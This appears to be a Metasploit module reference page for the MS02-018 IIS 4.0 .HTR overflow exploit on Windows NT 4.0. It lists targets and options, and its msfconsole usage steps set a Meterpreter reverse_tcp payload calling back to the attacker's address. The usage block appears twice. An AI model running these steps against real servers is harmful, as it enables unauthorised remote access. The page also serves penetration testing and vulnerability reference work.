Microsoft IIS 4.0 .HTR Path Overflow
This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have trouble terminating a bind shell. If you set EXITFUNC to thread, the server will crash upon exit of the bind shell. The payload is alpha-numerically encoded without a NOP sled because otherwise the data gets mangled by the filters.
Exploit Rank
- Good
Exploit Authors
- stinko < vinnie [at] metasploit.com >
Vulnerability References
- CVE-1999-0874
- OSVDB-3325
- BID-307
- http://www.eeye.com/html/research/advisories/AD19990608.html
- MSB-MS02-018
Exploit Targets
- 0 - Windows NT 4.0 SP3 (default)
- 1 - Windows NT 4.0 SP4
- 2 - Windows NT 4.0 SP5
Exploit Development
Similar Exploit Modules
- exploit/windows/iis/iis_webdav_upload_asp
- exploit/windows/iis/ms01_023_printer
- exploit/windows/iis/ms01_026_dbldecode
- exploit/windows/iis/ms01_033_idq
- exploit/windows/iis/ms03_007_ntdll_webdav
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/iis/ms02_018_htr
msf exploit(ms02_018_htr) > show payloads
msf exploit(ms02_018_htr) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms02_018_htr) > set LHOST [MY IP ADDRESS]
msf exploit(ms02_018_htr) > set RHOST [TARGET IP]
msf exploit(ms02_018_htr) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/iis/ms02_018_htr
msf exploit(ms02_018_htr) > show payloads
msf exploit(ms02_018_htr) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms02_018_htr) > set LHOST [MY IP ADDRESS]
msf exploit(ms02_018_htr) > set RHOST [TARGET IP]
msf exploit(ms02_018_htr) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 80) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |